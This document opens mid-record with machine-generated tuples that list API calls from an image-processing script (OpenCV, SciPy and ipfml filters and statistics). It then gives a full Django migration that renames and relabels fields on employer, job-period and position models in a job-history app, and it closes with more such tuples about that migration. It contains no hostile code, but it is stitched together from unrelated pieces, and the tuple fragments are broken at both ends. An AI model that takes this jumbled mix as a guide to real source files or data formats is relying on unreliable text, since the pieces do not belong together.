'(1)'], {}), '(arr, (3, 3), 1)\n', (13756, 13772), False, 'import cv2\n'), ((13797, 13831), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(1.5)'], {}), '(arr, (3, 3), 1.5)\n', (13813, 13831), False, 'import cv2\n'), ((13856, 13890), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(0.5)'], {}), '(arr, (5, 5), 0.5)\n', (13872, 13890), False, 'import cv2\n'), ((13915, 13947), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1)'], {}), '(arr, (5, 5), 1)\n', (13931, 13947), False, 'import cv2\n'), ((13972, 14006), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1.5)'], {}), '(arr, (5, 5), 1.5)\n', (13988, 14006), False, 'import cv2\n'), ((14031, 14053), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (14040, 
14053), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14078, 14100), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (14087, 14100), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14125, 14144), 'scipy.signal.wiener', 'wiener', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (14131, 14144), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14169, 14188), 'scipy.signal.wiener', 'wiener', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (14175, 14188), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((14247, 14272), 'numpy.array', 'np.array', (['wave', '"""float64"""'], {}), "(wave, 'float64')\n", (14255, 14272), True, 'import numpy as np\n'), ((14430, 14456), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (14451, 14456), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((14910, 14945), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (14929, 14945), False, 'from ipfml import utils\n'), ((15083, 15130), 'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (15117, 15130), False, 'from ipfml import utils\n'), ((15189, 15237), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (15224, 15237), False, 'from ipfml import utils\n'), ((15939, 15968), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['sub_zone'], {}), '(sub_zone)\n', (15958, 15968), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((15996, 16025), 'ipfml.utils.normalize_2D_arr', 'utils.normalize_2D_arr', (['l_img'], {}), '(l_img)\n', (16018, 16025), False, 'from ipfml import utils\n'), ((16104, 16179), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 
'kernels.min_bilateral_diff', '(3, 3)'], {}), '(normed_l_img, kernels.min_bilateral_diff, (3, 3))\n', (16129, 16179), False, 'from ipfml.filters import convolution, kernels\n'), ((16203, 16222), 'numpy.std', 'np.std', (['normed_diff'], {}), '(normed_diff)\n', (16209, 16222), True, 'import numpy as np\n'), ((16247, 16267), 'numpy.mean', 'np.mean', (['normed_diff'], {}), '(normed_diff)\n', (16254, 16267), True, 'import numpy as np\n'), ((16439, 16514), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.min_bilateral_diff', '(5, 5)'], {}), '(normed_l_img, kernels.min_bilateral_diff, (5, 5))\n', (16464, 16514), False, 'from ipfml.filters import convolution, kernels\n'), ((16538, 16557), 'numpy.std', 'np.std', (['normed_diff'], {}), '(normed_diff)\n', (16544, 16557), True, 'import numpy as np\n'), ((16582, 16602), 'numpy.mean', 'np.mean', (['normed_diff'], {}), '(normed_diff)\n', (16589, 16602), True, 'import numpy as np\n'), ((16781, 16848), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_mean', '(3, 3)'], {}), '(normed_l_img, kernels.plane_mean, (3, 3))\n', (16806, 16848), False, 'from ipfml.filters import convolution, kernels\n'), ((16878, 16903), 'numpy.std', 'np.std', (['normed_plane_mean'], {}), '(normed_plane_mean)\n', (16884, 16903), True, 'import numpy as np\n'), ((16934, 16960), 'numpy.mean', 'np.mean', (['normed_plane_mean'], {}), '(normed_plane_mean)\n', (16941, 16960), True, 'import numpy as np\n'), ((17153, 17220), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_mean', '(5, 5)'], {}), '(normed_l_img, kernels.plane_mean, (5, 5))\n', (17178, 17220), False, 'from ipfml.filters import convolution, kernels\n'), ((17250, 17275), 'numpy.std', 'np.std', (['normed_plane_mean'], {}), '(normed_plane_mean)\n', (17256, 17275), True, 'import numpy as np\n'), ((17306, 17332), 'numpy.mean', 'np.mean', 
(['normed_plane_mean'], {}), '(normed_plane_mean)\n', (17313, 17332), True, 'import numpy as np\n'), ((17529, 17601), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_max_error', '(3, 3)'], {}), '(normed_l_img, kernels.plane_max_error, (3, 3))\n', (17554, 17601), False, 'from ipfml.filters import convolution, kernels\n'), ((17630, 17654), 'numpy.std', 'np.std', (['normed_plane_max'], {}), '(normed_plane_max)\n', (17636, 17654), True, 'import numpy as np\n'), ((17684, 17709), 'numpy.mean', 'np.mean', (['normed_plane_max'], {}), '(normed_plane_max)\n', (17691, 17709), True, 'import numpy as np\n'), ((17912, 17984), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.plane_max_error', '(5, 5)'], {}), '(normed_l_img, kernels.plane_max_error, (5, 5))\n', (17937, 17984), False, 'from ipfml.filters import convolution, kernels\n'), ((18013, 18037), 'numpy.std', 'np.std', (['normed_plane_max'], {}), '(normed_plane_max)\n', (18019, 18037), True, 'import numpy as np\n'), ((18067, 18092), 'numpy.mean', 'np.mean', (['normed_plane_max'], {}), '(normed_plane_max)\n', (18074, 18092), True, 'import numpy as np\n'), ((22860, 22884), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['b'], {}), '(b)\n', (22881, 22884), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23176, 23200), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['b'], {}), '(b)\n', (23197, 23200), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23498, 23522), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['b'], {}), '(b)\n', (23519, 23522), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((24393, 24411), 'numpy.var', 'np.var', (['flat_coeff'], {}), '(flat_coeff)\n', (24399, 24411), True, 'import numpy as np\n'), ((3041, 3073), 
'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (3066, 3073), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((3147, 3166), 'numpy.mean', 'np.mean', (['l_svd_data'], {}), '(l_svd_data)\n', (3154, 3166), True, 'import numpy as np\n'), ((3192, 3213), 'numpy.median', 'np.median', (['l_svd_data'], {}), '(l_svd_data)\n', (3201, 3213), True, 'import numpy as np\n'), ((3239, 3268), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(25)'], {}), '(l_svd_data, 25)\n', (3252, 3268), True, 'import numpy as np\n'), ((3294, 3323), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(75)'], {}), '(l_svd_data, 75)\n', (3307, 3323), True, 'import numpy as np\n'), ((3349, 3367), 'numpy.var', 'np.var', (['l_svd_data'], {}), '(l_svd_data)\n', (3355, 3367), True, 'import numpy as np\n'), ((3992, 4024), 'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (4017, 4024), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((4098, 4117), 'numpy.mean', 'np.mean', (['l_svd_data'], {}), '(l_svd_data)\n', (4105, 4117), True, 'import numpy as np\n'), ((4143, 4164), 'numpy.median', 'np.median', (['l_svd_data'], {}), '(l_svd_data)\n', (4152, 4164), True, 'import numpy as np\n'), ((4190, 4219), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(25)'], {}), '(l_svd_data, 25)\n', (4203, 4219), True, 'import numpy as np\n'), ((4245, 4274), 'numpy.percentile', 'np.percentile', (['l_svd_data', '(75)'], {}), '(l_svd_data, 75)\n', (4258, 4274), True, 'import numpy as np\n'), ((4300, 4318), 'numpy.var', 'np.var', (['l_svd_data'], {}), '(l_svd_data)\n', (4306, 4318), True, 'import numpy as np\n'), ((4814, 4846), 'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (4839, 4846), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((5468, 5500), 
'ipfml.processing.transform.get_LAB_L_SVD_s', 'transform.get_LAB_L_SVD_s', (['sub_b'], {}), '(sub_b)\n', (5493, 5500), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7072, 7091), 'numpy.array', 'np.array', (['sv_values'], {}), '(sv_values)\n', (7080, 7091), True, 'import numpy as np\n'), ((7094, 7117), 'numpy.array', 'np.array', (['ica_sv_values'], {}), '(ica_sv_values)\n', (7102, 7117), True, 'import numpy as np\n'), ((9581, 9603), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (9587, 9603), True, 'import numpy as np\n'), ((10890, 10912), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (10896, 10912), True, 'import numpy as np\n'), ((12963, 12985), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (12969, 12985), True, 'import numpy as np\n'), ((14516, 14561), 'ipfml.utils.get_entropy_contribution_of_i', 'utils.get_entropy_contribution_of_i', (['s', 'id_sv'], {}), '(s, id_sv)\n', (14551, 14561), False, 'from ipfml import utils\n'), ((14972, 14994), 'numpy.std', 'np.std', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (14978, 14994), True, 'import numpy as np\n'), ((20913, 20936), 'numpy.std', 'np.std', (['diff_std_list_3'], {}), '(diff_std_list_3)\n', (20919, 20936), True, 'import numpy as np\n'), ((20962, 20986), 'numpy.std', 'np.std', (['diff_mean_list_3'], {}), '(diff_mean_list_3)\n', (20968, 20986), True, 'import numpy as np\n'), ((21012, 21035), 'numpy.std', 'np.std', (['diff_std_list_5'], {}), '(diff_std_list_5)\n', (21018, 21035), True, 'import numpy as np\n'), ((21061, 21085), 'numpy.std', 'np.std', (['diff_mean_list_5'], {}), '(diff_mean_list_5)\n', (21067, 21085), True, 'import numpy as np\n'), ((21112, 21136), 'numpy.std', 'np.std', (['plane_std_list_3'], {}), '(plane_std_list_3)\n', (21118, 21136), True, 'import numpy as np\n'), ((21162, 21187), 'numpy.std', 'np.std', (['plane_mean_list_3'], {}), '(plane_mean_list_3)\n', (21168, 21187), True, 'import 
numpy as np\n'), ((21213, 21237), 'numpy.std', 'np.std', (['plane_std_list_5'], {}), '(plane_std_list_5)\n', (21219, 21237), True, 'import numpy as np\n'), ((21263, 21288), 'numpy.std', 'np.std', (['plane_mean_list_5'], {}), '(plane_mean_list_5)\n', (21269, 21288), True, 'import numpy as np\n'), ((21327, 21355), 'numpy.std', 'np.std', (['plane_max_std_list_3'], {}), '(plane_max_std_list_3)\n', (21333, 21355), True, 'import numpy as np\n'), ((21381, 21410), 'numpy.std', 'np.std', (['plane_max_mean_list_3'], {}), '(plane_max_mean_list_3)\n', (21387, 21410), True, 'import numpy as np\n'), ((21436, 21464), 'numpy.std', 'np.std', (['plane_max_std_list_5'], {}), '(plane_max_std_list_5)\n', (21442, 21464), True, 'import numpy as np\n'), ((21490, 21519), 'numpy.std', 'np.std', (['plane_max_mean_list_5'], {}), '(plane_max_mean_list_5)\n', (21496, 21519), True, 'import numpy as np\n'), ((21586, 21610), 'numpy.mean', 'np.mean', (['diff_std_list_3'], {}), '(diff_std_list_3)\n', (21593, 21610), True, 'import numpy as np\n'), ((21636, 21661), 'numpy.mean', 'np.mean', (['diff_mean_list_3'], {}), '(diff_mean_list_3)\n', (21643, 21661), True, 'import numpy as np\n'), ((21687, 21711), 'numpy.mean', 'np.mean', (['diff_std_list_5'], {}), '(diff_std_list_5)\n', (21694, 21711), True, 'import numpy as np\n'), ((21737, 21762), 'numpy.mean', 'np.mean', (['diff_mean_list_5'], {}), '(diff_mean_list_5)\n', (21744, 21762), True, 'import numpy as np\n'), ((21789, 21814), 'numpy.mean', 'np.mean', (['plane_std_list_3'], {}), '(plane_std_list_3)\n', (21796, 21814), True, 'import numpy as np\n'), ((21840, 21866), 'numpy.mean', 'np.mean', (['plane_mean_list_3'], {}), '(plane_mean_list_3)\n', (21847, 21866), True, 'import numpy as np\n'), ((21892, 21917), 'numpy.mean', 'np.mean', (['plane_std_list_5'], {}), '(plane_std_list_5)\n', (21899, 21917), True, 'import numpy as np\n'), ((21943, 21969), 'numpy.mean', 'np.mean', (['plane_mean_list_5'], {}), '(plane_mean_list_5)\n', (21950, 21969), True, 'import 
numpy as np\n'), ((22008, 22037), 'numpy.mean', 'np.mean', (['plane_max_std_list_3'], {}), '(plane_max_std_list_3)\n', (22015, 22037), True, 'import numpy as np\n'), ((22063, 22093), 'numpy.mean', 'np.mean', (['plane_max_mean_list_3'], {}), '(plane_max_mean_list_3)\n', (22070, 22093), True, 'import numpy as np\n'), ((22119, 22148), 'numpy.mean', 'np.mean', (['plane_max_std_list_5'], {}), '(plane_max_std_list_5)\n', (22126, 22148), True, 'import numpy as np\n'), ((22174, 22204), 'numpy.mean', 'np.mean', (['plane_max_mean_list_5'], {}), '(plane_max_mean_list_5)\n', (22181, 22204), True, 'import numpy as np\n'), ((22911, 22932), 'ipfml.utils.get_entropy', 'utils.get_entropy', (['sv'], {}), '(sv)\n', (22928, 22932), False, 'from ipfml import utils\n'), ((23227, 23248), 'ipfml.utils.get_entropy', 'utils.get_entropy', (['sv'], {}), '(sv)\n', (23244, 23248), False, 'from ipfml import utils\n')] |
# Generated by Django 2.2.4 on 2019-08-04 21:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration (Django 2.2.4, 2019-08-04).

    Normalizes field options -- human-readable ``verbose_name`` labels plus
    ``blank``/``null``/``unique``/``max_length`` settings -- on every field
    of the ``Employer``, ``JobTimePeriod`` and ``Position`` models in the
    ``jobHistory`` app.  No columns are added or removed; ``AlterField``
    only rewrites field metadata (and any resulting constraint changes).
    """
    dependencies = [
        ('jobHistory', '0002_auto_20190106_0202'),
    ]
    operations = [
        # --- Employer: address, contact and identity fields ---
        migrations.AlterField(
            model_name='employer',
            name='city',
            field=models.CharField(blank=True, max_length=200, verbose_name='City'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='country',
            field=models.CharField(blank=True, max_length=200, verbose_name='Country'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='county_or_parish',
            field=models.CharField(blank=True, max_length=200, verbose_name='County or Parish'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='email',
            field=models.EmailField(blank=True, max_length=254, verbose_name='Email'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='industry',
            field=models.CharField(blank=True, max_length=254, verbose_name='Industry'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='long_name',
            field=models.CharField(max_length=254, null=True, unique=True, verbose_name='Long Name'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='phone',
            field=models.CharField(blank=True, max_length=50, verbose_name='Phone'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='short_name',
            field=models.CharField(max_length=50, unique=True, verbose_name='Short Name'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='state_or_province',
            field=models.CharField(blank=True, max_length=200, verbose_name='State or Province'),
        ),
        migrations.AlterField(
            model_name='employer',
            name='zip_or_postal_code',
            field=models.CharField(blank=True, max_length=50, verbose_name='Zip Code or Postal Code'),
        ),
        # --- JobTimePeriod: dates, pay and work-location fields ---
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='contributions_and_accomplishments',
            field=models.TextField(blank=True, verbose_name='Contributions and Accomplishments'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='end_day',
            field=models.PositiveSmallIntegerField(null=True, verbose_name='End Day'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='end_month',
            field=models.PositiveSmallIntegerField(null=True, verbose_name='End Month'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='end_year',
            field=models.PositiveIntegerField(null=True, verbose_name='End Year'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='ending_pay',
            field=models.CharField(max_length=50, verbose_name='Ending Pay'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='hours_per_week',
            field=models.PositiveSmallIntegerField(null=True, verbose_name='Hours per Week'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='is_current_position',
            field=models.BooleanField(default=True, verbose_name='Current Position?'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='position',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='jobHistory.Position', verbose_name='Position'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='start_day',
            field=models.PositiveSmallIntegerField(null=True, verbose_name='Start Day'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='start_month',
            field=models.PositiveSmallIntegerField(null=True, verbose_name='Start Month'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='start_year',
            field=models.PositiveIntegerField(verbose_name='Start Year'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='starting_pay',
            field=models.CharField(max_length=50, verbose_name='Starting Pay'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='work_city',
            field=models.CharField(blank=True, max_length=200, verbose_name='Work City'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='work_country',
            field=models.CharField(blank=True, max_length=200, verbose_name='Work Country'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='work_county_or_parish',
            field=models.CharField(blank=True, max_length=200, verbose_name='Work County or Parish'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='work_state_or_province',
            field=models.CharField(blank=True, max_length=200, verbose_name='Work State or Province'),
        ),
        migrations.AlterField(
            model_name='jobtimeperiod',
            name='work_zip_or_postal_code',
            field=models.CharField(blank=True, max_length=50, verbose_name='Work Zip Code or Postal Code'),
        ),
        # --- Position: role details and supervisor contact fields ---
        migrations.AlterField(
            model_name='position',
            name='can_contact',
            field=models.BooleanField(verbose_name='Can Contact?'),
        ),
        migrations.AlterField(
            model_name='position',
            name='contributions_and_accomplishments',
            field=models.TextField(blank=True, verbose_name='Contributions and Accomplishments'),
        ),
        migrations.AlterField(
            model_name='position',
            name='employer',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='jobHistory.Employer', verbose_name='Employer'),
        ),
        migrations.AlterField(
            model_name='position',
            name='responsibilities',
            field=models.TextField(blank=True, verbose_name='Responsibilities'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_city',
            field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor City'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_country',
            field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor Country'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_county_or_parish',
            field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor County or Parish'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_email',
            field=models.EmailField(blank=True, max_length=254, verbose_name='Supervisor Email'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_given_name',
            field=models.CharField(max_length=200, verbose_name='Supervisor Given Name'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_middle_name',
            field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor Middle Name'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_name_prefix',
            field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Name Prefix'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_name_suffix',
            field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Name Suffix'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_phone',
            field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Phone'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_state_or_province',
            field=models.CharField(blank=True, max_length=200, verbose_name='Supervisor State or Province'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_surname',
            field=models.CharField(max_length=200, verbose_name='Supervisor Surname'),
        ),
        migrations.AlterField(
            model_name='position',
            name='supervisor_zip_or_postal_code',
            field=models.CharField(blank=True, max_length=50, verbose_name='Supervisor Zip Code or Postal Code'),
        ),
        migrations.AlterField(
            model_name='position',
            name='title',
            field=models.CharField(max_length=200, verbose_name='Title'),
        ),
    ]
| [
"django.db.models.EmailField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.PositiveIntegerField",
"django.db.models.PositiveSmallIntegerField",
"django.db.models.CharField"
] | [((372, 437), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""City"""'}), "(blank=True, max_length=200, verbose_name='City')\n", (388, 437), False, 'from django.db import migrations, models\n'), ((562, 630), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Country"""'}), "(blank=True, max_length=200, verbose_name='Country')\n", (578, 630), False, 'from django.db import migrations, models\n'), ((764, 841), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""County or Parish"""'}), "(blank=True, max_length=200, verbose_name='County or Parish')\n", (780, 841), False, 'from django.db import migrations, models\n'), ((964, 1031), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""Email"""'}), "(blank=True, max_length=254, verbose_name='Email')\n", (981, 1031), False, 'from django.db import migrations, models\n'), ((1157, 1226), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""Industry"""'}), "(blank=True, max_length=254, verbose_name='Industry')\n", (1173, 1226), False, 'from django.db import migrations, models\n'), ((1353, 1440), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(254)', 'null': '(True)', 'unique': '(True)', 'verbose_name': '"""Long Name"""'}), "(max_length=254, null=True, unique=True, verbose_name=\n 'Long Name')\n", (1369, 1440), False, 'from django.db import migrations, models\n'), ((1558, 1623), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Phone"""'}), "(blank=True, max_length=50, verbose_name='Phone')\n", (1574, 1623), False, 'from django.db import migrations, models\n'), ((1751, 1822), 'django.db.models.CharField', 
'models.CharField', ([], {'max_length': '(50)', 'unique': '(True)', 'verbose_name': '"""Short Name"""'}), "(max_length=50, unique=True, verbose_name='Short Name')\n", (1767, 1822), False, 'from django.db import migrations, models\n'), ((1957, 2035), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""State or Province"""'}), "(blank=True, max_length=200, verbose_name='State or Province')\n", (1973, 2035), False, 'from django.db import migrations, models\n'), ((2171, 2259), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Zip Code or Postal Code"""'}), "(blank=True, max_length=50, verbose_name=\n 'Zip Code or Postal Code')\n", (2187, 2259), False, 'from django.db import migrations, models\n'), ((2410, 2488), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""Contributions and Accomplishments"""'}), "(blank=True, verbose_name='Contributions and Accomplishments')\n", (2426, 2488), False, 'from django.db import migrations, models\n'), ((2618, 2685), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""End Day"""'}), "(null=True, verbose_name='End Day')\n", (2650, 2685), False, 'from django.db import migrations, models\n'), ((2817, 2886), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""End Month"""'}), "(null=True, verbose_name='End Month')\n", (2849, 2886), False, 'from django.db import migrations, models\n'), ((3017, 3080), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'null': '(True)', 'verbose_name': '"""End Year"""'}), "(null=True, verbose_name='End Year')\n", (3044, 3080), False, 'from django.db import migrations, models\n'), ((3213, 3271), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': 
'(50)', 'verbose_name': '"""Ending Pay"""'}), "(max_length=50, verbose_name='Ending Pay')\n", (3229, 3271), False, 'from django.db import migrations, models\n'), ((3408, 3482), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""Hours per Week"""'}), "(null=True, verbose_name='Hours per Week')\n", (3440, 3482), False, 'from django.db import migrations, models\n'), ((3624, 3691), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Current Position?"""'}), "(default=True, verbose_name='Current Position?')\n", (3643, 3691), False, 'from django.db import migrations, models\n'), ((3822, 3940), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""jobHistory.Position"""', 'verbose_name': '"""Position"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'jobHistory.Position', verbose_name='Position')\n", (3839, 3940), False, 'from django.db import migrations, models\n'), ((4067, 4136), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""Start Day"""'}), "(null=True, verbose_name='Start Day')\n", (4099, 4136), False, 'from django.db import migrations, models\n'), ((4270, 4341), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""Start Month"""'}), "(null=True, verbose_name='Start Month')\n", (4302, 4341), False, 'from django.db import migrations, models\n'), ((4474, 4528), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'verbose_name': '"""Start Year"""'}), "(verbose_name='Start Year')\n", (4501, 4528), False, 'from django.db import migrations, models\n'), ((4663, 4723), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'verbose_name': '"""Starting Pay"""'}), "(max_length=50, 
verbose_name='Starting Pay')\n", (4679, 4723), False, 'from django.db import migrations, models\n'), ((4855, 4925), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work City"""'}), "(blank=True, max_length=200, verbose_name='Work City')\n", (4871, 4925), False, 'from django.db import migrations, models\n'), ((5060, 5133), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work Country"""'}), "(blank=True, max_length=200, verbose_name='Work Country')\n", (5076, 5133), False, 'from django.db import migrations, models\n'), ((5277, 5364), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work County or Parish"""'}), "(blank=True, max_length=200, verbose_name=\n 'Work County or Parish')\n", (5293, 5364), False, 'from django.db import migrations, models\n'), ((5504, 5592), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work State or Province"""'}), "(blank=True, max_length=200, verbose_name=\n 'Work State or Province')\n", (5520, 5592), False, 'from django.db import migrations, models\n'), ((5733, 5826), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Work Zip Code or Postal Code"""'}), "(blank=True, max_length=50, verbose_name=\n 'Work Zip Code or Postal Code')\n", (5749, 5826), False, 'from django.db import migrations, models\n'), ((5950, 5998), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'verbose_name': '"""Can Contact?"""'}), "(verbose_name='Can Contact?')\n", (5969, 5998), False, 'from django.db import migrations, models\n'), ((6149, 6227), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""Contributions and Accomplishments"""'}), "(blank=True, 
verbose_name='Contributions and Accomplishments')\n", (6165, 6227), False, 'from django.db import migrations, models\n'), ((6353, 6471), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""jobHistory.Employer"""', 'verbose_name': '"""Employer"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'jobHistory.Employer', verbose_name='Employer')\n", (6370, 6471), False, 'from django.db import migrations, models\n'), ((6600, 6661), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""Responsibilities"""'}), "(blank=True, verbose_name='Responsibilities')\n", (6616, 6661), False, 'from django.db import migrations, models\n'), ((6794, 6870), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor City"""'}), "(blank=True, max_length=200, verbose_name='Supervisor City')\n", (6810, 6870), False, 'from django.db import migrations, models\n'), ((7006, 7085), 